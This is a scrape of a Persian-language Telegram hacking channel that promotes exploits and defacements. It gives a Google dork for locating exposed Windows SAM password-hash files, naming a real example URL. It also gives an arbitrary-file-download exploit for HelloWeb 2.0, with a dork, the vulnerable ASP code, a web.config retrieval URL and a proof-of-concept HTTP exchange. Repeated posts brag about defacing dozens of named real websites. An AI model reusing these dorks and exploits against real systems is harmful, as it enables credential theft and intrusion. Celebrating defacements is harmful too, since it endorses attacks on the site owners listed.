0Day.Today | Learn Exploit | Zero World | Dark web |
19.1K subscribers
1.23K photos
127 videos
489 files
1.28K links
☝️Iп Tнε Nαмε Oғ GOD☝️

Web Exploiting
& Server Hacking
Shell & Admin panel Access

priv8 Google hacking Dorks
new vul & bugs discovering & Tut


❗️0 day is today❗️

تبلیغات : @LearnExploitAds

IR0Day.Today
Download Telegram
اموزش بدست اوردن
userName & password
سیستم ویندوز از طریق سایت 😄
------
#Find #SAM file with a #Dork (#GHDB) #OS_Windows
------
شاید اول از هر چیزی بپرسید که SAM چیه ؟
دوستان SAM با همون
Security Account Manager
است که user and pass ویندوز رو درون خودش نگهداری میکنه !
فایل SAM ساختار ساده ای داره و از دو نوع الگوریتم Hashing به نام های LM (یه یک الگریتم ضعیف بوده) و NTLM (که یک الگریتم جدید و بهبود یافته است) .
شما میتونید فایل SAM ویندوز خودتون رو از مسیر زیر بدست بیارید :
%SystemRoot%/system32/config/SAM
(در مورد Dump این فاید بعدا صحبت میکنیم).
_
حالا روش بدست اوردن این فایل از طریق وب :
Dork : filetype:txt Administrator:500:
و تمام :)
نمونه :
https://www.albany.edu/~goel/classes/spring2010/itm604/pwfile.txt
=====================
#X0P4SH4
T.me/LearnExploit
0Day.Today
👍1
extract users etcpassword.py
692 B
اسکریپت اسخراج یوزر های موجود در دایرکتوری
/etc/password/
#Script #python (py) #linux (OS)
@learnExploit ~ #X0P4SH4
#Hacked By #X0P4SH4
[+] X0P4SH4 - iliyahr - R4DIKALL - UZIHACKER - EVILBOY [+]
https://mirror-h.org/zone/2652844/
https://casapulita.de/

——————
@LearnExploit
#Hacked By #X0P4SH4
[+] X0P4SH4 - iliyahr - R4DIKALL - UZIHACKER - EVILBOY [+]
https://mirror-h.org/zone/2652978/
http://amazh.com/

——————
@LearnExploit
#Hacked By #X0P4SH4
[+] X0P4SH4 - iliyahr - SQLHunter - UZIHACKER - EVILBOY [+]
https://mirror-h.org/zone/2653676/
https://drfadaei.50m.ir/

——————
@LearnExploit
#Hacked By #X0P4SH4
[+] X0P4SH4 - iliyahr - R4DiKaLL - UZIHACKER - EVILBOY [+]
https://mirror-h.org/zone/2658235/
https://wp.aryanweb.com/

——————
@LearnExploit
#Exploit #WebApp #HelloWeb #Arbitrary #File #Download #vulnerabilities
#اسیب_پذیری #برنامه_تحت_وب #بارگیری #فایل #دلخواه

با سلام خدمت دوستان عزیز
در این قسمت اسیب پذیری یافت شده در برنامه ی تحت وب به نام HelloWeb را مورد بررسی قرار دهیم.

ابتدا توضیح مختصری در مورد باگ Arbitrary File Download بدیم :
به زبان ساده اگر توضیح بدم نوع دیگری از باگ ها LFI/RFI میباشد.
با این تفاوت که شما در این باگ قابلیت Travel Dir رو‌ندارین! یعنی نمیتونید بین مسیرهای موجود گشت و گذار کنید و فقط میتونید فایل یا فایل های مد نظر رو دانلود کنید.(البته بعضی از پارامتر های موجود این قابلیت رو داره).
اگه هنوز با باگ های LFI و RFI اشنا نیستید روی لینک های زیر کلیک کنید.
Link

#Exploit-Title : ( HelloWeb 2.0 - Arbitrary File Download )

#Dork : ( Inurl:exec/file/download.asp )

#vulnerable-Code :

filepath = Request.QueryString("filepath")
filename = Request.QueryString("filename")
filepath = Replace(filepath,"/","\")

root_path = server.MapPath("/")
Set fso = CreateObject("Scripting.FileSystemObject")
Set root_folder = fso.GetFolder(root_path)

attachfile = root_path & filepath & "\" & filename

Response.Clear
Response.ContentType = "application/unknown"
Response.AddHeader "Pragma", "no-cache"
Response.AddHeader "Expires", "0"
Response.AddHeader "Content-Transfer-Encoding", "binary"
Response.AddHeader "Content-Disposition","attachment; filename = " & Server.URLPathEncode(filename)

Set objStream = Server.CreateObject("ADODB.Stream")
objStream.Open

objStream.Type = 1
objStream.LoadFromFile attachfile

Response.BinaryWrite objStream.Read
Response.Flush

طبق کد های مد نظر! این کد ها دسترسی دانلود فایل رو‌برای ما میده.
پارامتر هایی که اسیب‌پذیر هستند :
filtepath - filename - root_path - fso - root_folder - attachfile - objStream - strFile

چطوری میتوان از پارامترهای اسیب پذیر استفاده کرد :
به مثال زیر دقت کنید :
https://Target/download.asp?filepath=/&filename=hello.pdf

در این URL ما میفهمیم که فایل Download.asp اجازه ی دانلود فایل از مسیر / ( مسیر فعلی که ما هستیم)و فایل hello.pdf رو داده ...

نحوه ی اکسپلویت این باگ :
#Exploit :
ابتدا با استفاده از دورک‌ سایت اسیب پذیر رو پیدا کنید.
سپس
exec/file/download.asp?filepath=/&filename=web.config
رو‌به اخر هدفتون اضافه کنید.
البته این یک نمونه هست !
شما میتونید فایل های بیشتری رو‌ با پارامتر متفاوت تست کنید.

#PoC
تست :
این تست روی لوکال هاست صورت گرفته.

GET /exec/file/download.asp?filepath=/&filename=web.config HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Upgrade-Insecure-Requests: 1

RESPONSE: (پاسخ)
HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Content-Type: application/unknown; Charset=utf-8
Expires: 0,Thu, 09 Jul 2020 10:51:14 GMT
Server:
Content-Transfer-Encoding: binary
Content-Disposition: attachment; filename = web.config
Set-Cookie: ASPSESSIONIDQQCBDRBB=BEMDPMDDKFHNFKFMJGHIKKKI; path=/
Access-Control-Allow-Origin: *
x-xss-protection: 1; mode=block
Date: Thu, 09 Jul 2020 10:51:14 GMT
Connection: close

نحوه ی Fix این باگ تو پست بعدی براتون شرح میدم.
امیدوارم که با کارتون بیاد...
هرگونه سوالی داشتید میتونید توی گروه بپرسید.
#X0P4SH4

IR0Day.Today Guy's
@LearnExploit
@Tech_Army
#Hacked By #X0P4SH4
[+] X0P4SH4 - iliyahr - R4DiKaLL - UZIHACKER - EVILBOY - AT7 [+]
https://www.zone-h.org/mirror/id/38946463
https://www.bahraami.com/
——————
0Day.Today
@LearnExploit
@Tech_Army
#Hacked By #X0P4SH4
[+] X0P4SH4 - iliyahr - R4DIKALL - AT7 - EVIL_BOY - Milad Hacking - MMD B4YPASS - S1R4M1R [+]
site : turkmal.ir
zone-h : http://www.zone-h.org/mirror/id/38954850
==============
0Day.Today
@LearnExploit
@Tech_Army
#Hacked By #X0P4SH4
[+] X0P4SH4 - iliyahr - R4DIKALL - AT7 - EVIL_BOY - Milad Hacking - MMD B4YPASS - S1R4M1R [+]
=============
site : ytn-pj.com
zone-h : http://www.zone-h.org/mirror/id/38955146

site : y-wtf.com
zone-h : http://www.zone-h.org/mirror/id/38955145

site : yakiniku-todoroki.jp
zone-h : http://www.zone-h.org/mirror/id/38955144

site : takusagawa-ya.com
zone-h : http://www.zone-h.org/mirror/id/38955143

site : houmonsakura.com
zone-h : http://www.zone-h.org/mirror/id/38955142

site : nishino-seikotsuin.com
zone-h : http://www.zone-h.org/mirror/id/38955141

site : minami-alps-klein.jp
zone-h : http://www.zone-h.org/mirror/id/38955140

site : kushigatayama.com
zone-h : http://www.zone-h.org/mirror/id/38955138

site : kofu-aoba.com
zone-h : http://www.zone-h.org/mirror/id/38955137

site : kiseki-kokoro.com
zone-h : http://www.zone-h.org/mirror/id/38955119
==============
0Day.Today
@LearnExploit
@Tech_Army
#Hacked By #X0P4SH4
[+] X0P4SH4 - iliyahr - R4DIKALL - AT7 - EVIL_BOY - Milad Hacking - MMD B4YPASS - S1R4M1R [+]

site : korirug.com
zone-h : http://www.zone-h.org/mirror/id/38955117

site : gunnai.com
zone-h : http://www.zone-h.org/mirror/id/38955110

site : haneru.net
zone-h : http://www.zone-h.org/mirror/id/38955109

site : farm-kunugi.com
zone-h : http://www.zone-h.org/mirror/id/38955108

site : clean-fighters.jp
zone-h : http://www.zone-h.org/mirror/id/38955107

site : mamoribito.net
zone-h : http://www.zone-h.org/mirror/id/38955106

site : aramorikatsu.com
zone-h : http://www.zone-h.org/mirror/id/38955105

site : tower3710.net
zone-h : http://www.zone-h.org/mirror/id/38955104

site : shibaurasanbashi-cruise.com
zone-h : http://www.zone-h.org/mirror/id/38955103

site : kamopro.com
zone-h : http://www.zone-h.org/mirror/id/38955102
==============
0Day.Today
@LearnExploit
@Tech_Army
#Hacked By #X0P4SH4
[+] X0P4SH4 - iliyahr - R4DIKALL - AT7 - EVIL_BOY - Milad Hacking - MMD B4YPASS - S1R4M1R [+]

site : air-claire.com
zone-h : http://www.zone-h.org/mirror/id/38955101

site : j-enterprise.com
zone-h : http://www.zone-h.org/mirror/id/38955099

site : kensyoin.net
zone-h : www.zone-h.org/mirror/id/38955118
==============
0Day.Today
@LearnExploit
@Tech_Army